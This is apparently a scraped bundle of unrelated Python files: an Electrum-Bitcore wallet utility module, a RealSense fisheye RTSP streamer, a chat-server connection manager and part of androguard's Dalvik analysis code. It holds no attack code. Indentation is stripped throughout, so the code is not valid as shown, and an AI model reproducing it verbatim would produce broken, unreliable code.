is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; bytearray input is copied to bytes (kept for Python 2 compatibility).
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
    '01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-bitcore")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Bitcore")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Bitcore")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
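# Example (illustrative, assuming a locale whose decimal point is '.'):
#     format_satoshis(1234500)                 -> '0.012345'
#     format_satoshis(-1234500, is_diff=True)  -> '-0.012345'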
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bitcore.cc Insight': ('https://insight.bitcore.cc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chainz Explorer': ('https://chainz.cryptoid.info/btx/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcore address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcore URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcore address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
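# Example (illustrative; <addr> stands for a valid Bitcore address, amounts are in BTX):
#     parse_URI('bitcoin:<addr>?amount=0.5&message=donation')
#     -> {'address': '<addr>', 'amount': 50000000, 'message': 'donation', 'memo': 'donation'}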
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def set_recv_time(self):
self.recv_time = time.time()
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
|
fisheye_stream_to_rtsp.py
|
#!/usr/bin/env python3
import sys
sys.path.append('/usr/local/lib/')
import pyrealsense2 as rs
import cv2
import gi
import time
import numpy as np
gi.require_version('Gst', '1.0')
gi.require_version('GstRtspServer', '1.0')
from gi.repository import Gst, GstRtspServer, GLib
frame_left = None
frame_right = None
last_process = time.time()
class SensorFactory(GstRtspServer.RTSPMediaFactory):
def __init__(self, frame_type = 1, **properties):
super(SensorFactory, self).__init__(**properties)
self.frame_type = frame_type
self.number_frames = 0
self.fps = 60
self.duration = 1 / self.fps * Gst.SECOND
self.launch_string = 'appsrc name=source is-live=true block=true format=GST_FORMAT_TIME ' \
'caps=video/x-raw,format=RGB,width=848,height=800,framerate={}/1 ' \
'! videoconvert ! video/x-raw,format=I420 ' \
'! x264enc speed-preset=ultrafast tune=zerolatency ' \
'! rtph264pay config-interval=1 name=pay0 pt=96'.format(self.fps)
    def on_need_data(self, src, length):
        global frame_left
        global frame_right
        global last_process  # update the module-level timestamp rather than a local shadow
frame = None
if self.frame_type == 1:
frame = frame_left
elif self.frame_type == 2:
frame = frame_right
if frame is not None:
data = frame.tobytes()
buf = Gst.Buffer.new_allocate(None, len(data), None)
buf.fill(0, data)
buf.duration = self.duration
timestamp = self.number_frames * self.duration
buf.pts = buf.dts = int(timestamp)
buf.offset = timestamp
self.number_frames += 1
retval = src.emit('push-buffer', buf)
last_process = time.time()
if retval != Gst.FlowReturn.OK:
print(retval)
def do_create_element(self, url):
return Gst.parse_launch(self.launch_string)
def do_configure(self, rtsp_media):
self.number_frames = 0
appsrc = rtsp_media.get_element().get_child_by_name('source')
appsrc.connect('need-data', self.on_need_data)
class GstServer(GstRtspServer.RTSPServer):
def __init__(self, **properties):
super(GstServer, self).__init__(**properties)
for i in [1,2]:
factory = SensorFactory(i)
factory.set_shared(True)
self.get_mount_points().add_factory(f"/fisheye/{i}", factory)
self.attach(None)
Gst.init(None)
server = GstServer()
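# Note (assumption): GstRtspServer listens on its default service port 8554, so the two
# streams should be reachable at rtsp://<host>:8554/fisheye/1 and rtsp://<host>:8554/fisheye/2.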
def t265_loop():
global frame_left
global frame_right
print("T265 thread start...")
pipe = rs.pipeline()
cfg = rs.config()
profile = pipe.start(cfg)
print("Device connected")
while True:
frames = pipe.wait_for_frames()
image_left = np.asanyarray(frames.get_fisheye_frame(1).get_data())
image_right = np.asanyarray(frames.get_fisheye_frame(2).get_data())
frame_left = cv2.cvtColor(image_left, cv2.COLOR_GRAY2RGB)
frame_right = cv2.cvtColor(image_right, cv2.COLOR_GRAY2RGB)
import threading
threading.Thread(target=t265_loop, args=()).start()
loop = GLib.MainLoop()
loop.run()
|
global_manager.py
|
from multiprocessing import Lock
from threading import Thread
from message import *
class GlobalManger(object):
__instance = None
__inited = False
_l = Lock()
def __new__(cls, *args, **kwargs):
if not cls.__instance:
cls.__instance = super().__new__(cls)
return cls.__instance
def __init__(self):
self._l.acquire()
if not self.__inited:
self.__inited = True
self.__server = True
# self.__login_ids = set()
self.__connected = {}
self.__save_msg = {}
self._l.release()
def add_connect(self, id_: str, trans):
self._l.acquire()
if self.__server:
# self.__login_ids.add(id_)
self.__connected[id_] = trans
if self.__save_msg.get(id_):
Thread(target=self._notify_connect, kwargs={'key': id_, 'conn': trans}).start()
self._l.release()
print('add_connect', id_, trans)
def del_connect(self, id_):
conn = None
self._l.acquire()
if self.__server:
if self.__connected.get(id_):
# self.__login_ids.remove(id_)
conn = self.__connected.pop(id_)
self._l.release()
print('del_connect', conn)
def is_login(self, id_):
ret = False
self._l.acquire()
if self.__server:
if self.__connected.get(id_):
ret = True
self._l.release()
return ret
def send_msg2id(self, toid, msg) -> bool:
ret = False
self._l.acquire()
if self.__server:
trans = self.__connected.get(toid)
if trans:
ret = trans.recv_notify(msg)
            else:  # if the peer is offline, store the message and deliver it once the peer reconnects
self._save_msg(toid, msg)
ret = True
self._l.release()
return ret
def _save_msg(self, toid, msg):
if type(msg) == RetOnlineNotifyMsg:
return
if not self.__save_msg.get(toid):
self.__save_msg[toid] = []
self.__save_msg[toid].append(msg)
if len(self.__save_msg[toid]) > 1000:
del self.__save_msg[toid][0]
@staticmethod
def _add_msg2dict(msg, d, key, limit):
if not d.get(key):
d[key] = []
d[key].append(msg)
if len(d[key]) > limit:
del d[key][0]
@use_log
def _notify_connect(self, conn, key):
""" 如果再下线期间有没收到的消息,则上线后再通知 """
print(conn, key)
for msg in self.__save_msg[key]:
conn.recv_notify(msg)
self._l.acquire()
del self.__save_msg[key]
self._l.release()
    @use_log
    def close_all_connect(self):
        self._l.acquire()
        self.__server = False
        self._l.release()
        # iterate over a snapshot: deleting entries while iterating the dict itself raises RuntimeError
        for key, trans in list(self.__connected.items()):
            trans.ready2exit()
            del self.__connected[key]
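# Illustrative usage (not from the original source; `conn` stands for any transport
# object exposing recv_notify() and ready2exit(), `msg` for a message from message.py):
#
#     gm = GlobalManger()            # always yields the same singleton instance
#     gm.add_connect('alice', conn)
#     gm.send_msg2id('alice', msg)   # delivered immediately, or queued while offline
#     gm.close_all_connect()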
|
analysis.py
|
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
import re
import collections
import threading
import queue
import time
from androguard.core.androconf import warning, debug, is_ascii_problem
from androguard.core.bytecodes import dvm
class DVMBasicBlock(object):
"""
A simple basic block of a dalvik method
"""
def __init__(self, start, vm, method, context):
self.__vm = vm
self.method = method
self.context = context
self.last_length = 0
self.nb_instructions = 0
self.fathers = []
self.childs = []
self.start = start
self.end = self.start
self.special_ins = {}
self.name = "%s-BB@0x%x" % (self.method.get_name(), self.start)
self.exception_analysis = None
self.notes = []
self.__cached_instructions = None
def get_notes(self):
return self.notes
def set_notes(self, value):
self.notes = [value]
def add_note(self, note):
self.notes.append(note)
def clear_notes(self):
self.notes = []
    def get_instructions(self):
        """
        Get all instructions from a basic block.
        :rtype: a generator over the instructions of the current basic block
        """
        idx = 0
        for i in self.method.get_instructions():
            if self.start <= idx < self.end:
                yield i
            idx += i.get_length()
def get_nb_instructions(self):
return self.nb_instructions
def get_method(self):
return self.method
def get_name(self):
return "%s-BB@0x%x" % (self.method.get_name(), self.start)
def get_start(self):
return self.start
def get_end(self):
return self.end
    def get_last(self):
        # get_instructions() is a generator, so materialize it before indexing
        return list(self.get_instructions())[-1]
def get_next(self):
"""
Get next basic blocks
:rtype: a list of the next basic blocks
"""
return self.childs
def get_prev(self):
"""
Get previous basic blocks
:rtype: a list of the previous basic blocks
"""
return self.fathers
def set_fathers(self, f):
self.fathers.append(f)
def get_last_length(self):
return self.last_length
def set_childs(self, values):
# print self, self.start, self.end, values
if not values:
next_block = self.context.get_basic_block(self.end + 1)
if next_block is not None:
self.childs.append((self.end - self.get_last_length(), self.end,
next_block))
else:
for i in values:
if i != -1:
next_block = self.context.get_basic_block(i)
if next_block is not None:
self.childs.append((self.end - self.get_last_length(),
i, next_block))
for c in self.childs:
if c[2] is not None:
c[2].set_fathers((c[1], c[0], self))
def push(self, i):
self.nb_instructions += 1
idx = self.end
self.last_length = i.get_length()
self.end += self.last_length
op_value = i.get_op_value()
if op_value == 0x26 or (0x2b <= op_value <= 0x2c):
code = self.method.get_code().get_bc()
self.special_ins[idx] = code.get_ins_off(idx + i.get_ref_off() * 2)
def get_special_ins(self, idx):
"""
Return the associated instruction to a specific instruction (for example a packed/sparse switch)
:param idx: the index of the instruction
:rtype: None or an Instruction
"""
        try:
            return self.special_ins[idx]
        except KeyError:
            return None
def get_exception_analysis(self):
return self.exception_analysis
def set_exception_analysis(self, exception_analysis):
self.exception_analysis = exception_analysis
def show(self):
print(self.get_name(), self.get_start(), self.get_end())
class Enum(object):
def __init__(self, names):
self.names = names
for value, name in enumerate(self.names):
setattr(self, name.upper(), value)
def tuples(self):
return tuple(enumerate(self.names))
TAG_ANDROID = Enum(
['ANDROID', 'TELEPHONY', 'SMS', 'SMSMESSAGE', 'ACCESSIBILITYSERVICE',
'ACCOUNTS', 'ANIMATION', 'APP', 'BLUETOOTH', 'CONTENT', 'DATABASE',
'DEBUG', 'DRM', 'GESTURE', 'GRAPHICS', 'HARDWARE', 'INPUTMETHODSERVICE',
'LOCATION', 'MEDIA', 'MTP', 'NET', 'NFC', 'OPENGL', 'OS', 'PREFERENCE',
'PROVIDER', 'RENDERSCRIPT', 'SAX', 'SECURITY', 'SERVICE', 'SPEECH',
'SUPPORT', 'TEST', 'TEXT', 'UTIL', 'VIEW', 'WEBKIT', 'WIDGET',
'DALVIK_BYTECODE', 'DALVIK_SYSTEM', 'JAVA_REFLECTION'])
TAG_REVERSE_ANDROID = dict((i[0], i[1]) for i in TAG_ANDROID.tuples())
TAGS_ANDROID = {
TAG_ANDROID.ANDROID: [0, "Landroid"],
TAG_ANDROID.TELEPHONY: [0, "Landroid/telephony"],
TAG_ANDROID.SMS: [0, "Landroid/telephony/SmsManager"],
TAG_ANDROID.SMSMESSAGE: [0, "Landroid/telephony/SmsMessage"],
TAG_ANDROID.DEBUG: [0, "Landroid/os/Debug"],
TAG_ANDROID.ACCESSIBILITYSERVICE: [0, "Landroid/accessibilityservice"],
TAG_ANDROID.ACCOUNTS: [0, "Landroid/accounts"],
TAG_ANDROID.ANIMATION: [0, "Landroid/animation"],
TAG_ANDROID.APP: [0, "Landroid/app"],
TAG_ANDROID.BLUETOOTH: [0, "Landroid/bluetooth"],
TAG_ANDROID.CONTENT: [0, "Landroid/content"],
TAG_ANDROID.DATABASE: [0, "Landroid/database"],
TAG_ANDROID.DRM: [0, "Landroid/drm"],
TAG_ANDROID.GESTURE: [0, "Landroid/gesture"],
TAG_ANDROID.GRAPHICS: [0, "Landroid/graphics"],
TAG_ANDROID.HARDWARE: [0, "Landroid/hardware"],
TAG_ANDROID.INPUTMETHODSERVICE: [0, "Landroid/inputmethodservice"],
TAG_ANDROID.LOCATION: [0, "Landroid/location"],
TAG_ANDROID.MEDIA: [0, "Landroid/media"],
TAG_ANDROID.MTP: [0, "Landroid/mtp"],
TAG_ANDROID.NET: [0, "Landroid/net"],
TAG_ANDROID.NFC: [0, "Landroid/nfc"],
TAG_ANDROID.OPENGL: [0, "Landroid/opengl"],
TAG_ANDROID.OS: [0, "Landroid/os"],
TAG_ANDROID.PREFERENCE: [0, "Landroid/preference"],
TAG_ANDROID.PROVIDER: [0, "Landroid/provider"],
TAG_ANDROID.RENDERSCRIPT: [0, "Landroid/renderscript"],
TAG_ANDROID.SAX: [0, "Landroid/sax"],
TAG_ANDROID.SECURITY: [0, "Landroid/security"],
TAG_ANDROID.SERVICE: [0, "Landroid/service"],
TAG_ANDROID.SPEECH: [0, "Landroid/speech"],
TAG_ANDROID.SUPPORT: [0, "Landroid/support"],
TAG_ANDROID.TEST: [0, "Landroid/test"],
TAG_ANDROID.TEXT: [0, "Landroid/text"],
TAG_ANDROID.UTIL: [0, "Landroid/util"],
TAG_ANDROID.VIEW: [0, "Landroid/view"],
TAG_ANDROID.WEBKIT: [0, "Landroid/webkit"],
TAG_ANDROID.WIDGET: [0, "Landroid/widget"],
TAG_ANDROID.DALVIK_BYTECODE: [0, "Ldalvik/bytecode"],
TAG_ANDROID.DALVIK_SYSTEM: [0, "Ldalvik/system"],
TAG_ANDROID.JAVA_REFLECTION: [0, "Ljava/lang/reflect"],
}
class Tags(object):
"""
Handle specific tags
:param patterns:
:params reverse:
"""
def __init__(self, patterns=TAGS_ANDROID, reverse=TAG_REVERSE_ANDROID):
self.tags = set()
self.patterns = patterns
        self.reverse = reverse  # honour the argument instead of always using the module default
for i in self.patterns:
self.patterns[i][1] = re.compile(self.patterns[i][1])
def emit(self, method):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search(method.get_class()) is not None:
self.tags.add(i)
def emit_by_classname(self, classname):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search(classname) is not None:
self.tags.add(i)
def get_list(self):
return [self.reverse[i] for i in self.tags]
def __contains__(self, key):
return key in self.tags
def __str__(self):
return str([self.reverse[i] for i in self.tags])
def empty(self):
return self.tags == set()
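# Illustrative example (assumes the default Android patterns above):
#
#     t = Tags()
#     t.emit_by_classname("Landroid/telephony/SmsManager;")
#     'SMS' in t.get_list()   # True: the SmsManager pattern matched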
class BasicBlocks(object):
"""
This class represents all basic blocks of a method
"""
def __init__(self, _vm):
self.__vm = _vm
self.bb = []
def push(self, bb):
self.bb.append(bb)
def pop(self, idx):
return self.bb.pop(idx)
def get_basic_block(self, idx):
for i in self.bb:
if i.get_start() <= idx < i.get_end():
return i
return None
def get(self):
"""
:rtype: return each basic block (:class:`DVMBasicBlock` object)
"""
for i in self.bb:
yield i
def gets(self):
"""
:rtype: a list of basic blocks (:class:`DVMBasicBlock` objects)
"""
return self.bb
def get_basic_block_pos(self, idx):
return self.bb[idx]
class ExceptionAnalysis(object):
def __init__(self, exception, bb):
self.start = exception[0]
self.end = exception[1]
self.exceptions = exception[2:]
for i in self.exceptions:
i.append(bb.get_basic_block(i[1]))
def show_buff(self):
buff = "%x:%x\n" % (self.start, self.end)
for i in self.exceptions:
if i[2] is None:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2])
else:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2].get_name())
return buff[:-1]
def get(self):
d = {"start": self.start, "end": self.end, "list": []}
for i in self.exceptions:
d["list"].append({"name": i[0], "idx": i[1], "bb": i[2].get_name()})
return d
class Exceptions(object):
def __init__(self, _vm):
self.__vm = _vm
self.exceptions = []
def add(self, exceptions, basic_blocks):
for i in exceptions:
self.exceptions.append(ExceptionAnalysis(i, basic_blocks))
def get_exception(self, addr_start, addr_end):
for i in self.exceptions:
# print hex(i.start), hex(i.end), hex(addr_start), hex(addr_end), i.start >= addr_start and i.end <= addr_end, addr_end <= i.end and addr_start >= i.start
if i.start >= addr_start and i.end <= addr_end:
return i
elif addr_end <= i.end and addr_start >= i.start:
return i
return None
def gets(self):
return self.exceptions
def get(self):
for i in self.exceptions:
yield i
BasicOPCODES = []
for i in dvm.BRANCH_DVM_OPCODES:
BasicOPCODES.append(re.compile(i))
class MethodAnalysis(object):
"""
This class analyses in details a method of a class/dex file
:type vm: a :class:`DalvikVMFormat` object
:type method: a :class:`EncodedMethod` object
"""
def __init__(self, vm, method):
self.__vm = vm
self.method = method
self.basic_blocks = BasicBlocks(self.__vm)
self.exceptions = Exceptions(self.__vm)
self.code = self.method.get_code()
if self.code is None:
return
current_basic = DVMBasicBlock(0, self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
##########################################################
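        # Descriptive note: the code below builds basic blocks in two passes.
        # `l` collects every offset that must start a new block (branch targets and
        # exception handler entry points), while `h` maps each branch instruction's
        # offset to the offsets of its possible successors.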
bc = self.code.get_bc()
l = []
h = {}
idx = 0
debug("Parsing instructions")
for i in bc.get_instructions():
for j in BasicOPCODES:
if j.match(i.get_name()) is not None:
v = dvm.determineNext(i, idx, self.method)
h[idx] = v
l.extend(v)
break
idx += i.get_length()
debug("Parsing exceptions")
excepts = dvm.determineException(self.__vm, self.method)
for i in excepts:
l.extend([i[0]])
for handler in i[2:]:
l.append(handler[1])
debug("Creating basic blocks in %s" % self.method)
idx = 0
for i in bc.get_instructions():
# index is a destination
if idx in l:
if current_basic.get_nb_instructions() != 0:
current_basic = DVMBasicBlock(current_basic.get_end(),
self.__vm, self.method,
self.basic_blocks)
self.basic_blocks.push(current_basic)
current_basic.push(i)
# index is a branch instruction
if idx in h:
current_basic = DVMBasicBlock(current_basic.get_end(),
self.__vm, self.method,
self.basic_blocks)
self.basic_blocks.push(current_basic)
idx += i.get_length()
if current_basic.get_nb_instructions() == 0:
self.basic_blocks.pop(-1)
debug("Settings basic blocks childs")
for i in self.basic_blocks.get():
try:
i.set_childs(h[i.end - i.get_last_length()])
except KeyError:
i.set_childs([])
debug("Creating exceptions")
# Create exceptions
self.exceptions.add(excepts, self.basic_blocks)
for i in self.basic_blocks.get():
# setup exception by basic block
i.set_exception_analysis(self.exceptions.get_exception(i.start,
i.end - 1))
del h, l
def get_basic_blocks(self):
"""
:rtype: a :class:`BasicBlocks` object
"""
return self.basic_blocks
def get_length(self):
"""
:rtype: an integer which is the length of the code
"""
return self.code.get_length() if self.code else 0
def get_vm(self):
return self.__vm
def get_method(self):
return self.method
def show(self):
print("METHOD", self.method.get_class_name(), self.method.get_name(
), self.method.get_descriptor())
for i in self.basic_blocks.get():
print("\t", i)
i.show()
print("")
def show_methods(self):
print("\t #METHODS :")
for i in self.__bb:
methods = i.get_methods()
for method in methods:
print("\t\t-->", method.get_class_name(), method.get_name(
), method.get_descriptor())
for context in methods[method]:
print("\t\t\t |---|", context.details)
def get_tags(self):
"""
Return the tags of the method
:rtype: a :class:`Tags` object
"""
return self.tags
class StringAnalysis(object):
def __init__(self, value):
self.value = value
self.orig_value = value
self.xreffrom = set()
def AddXrefFrom(self, classobj, methodobj):
# debug("Added strings xreffrom for %s to %s" % (self.value, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def set_value(self, value):
self.value = value
def get_value(self):
return self.value
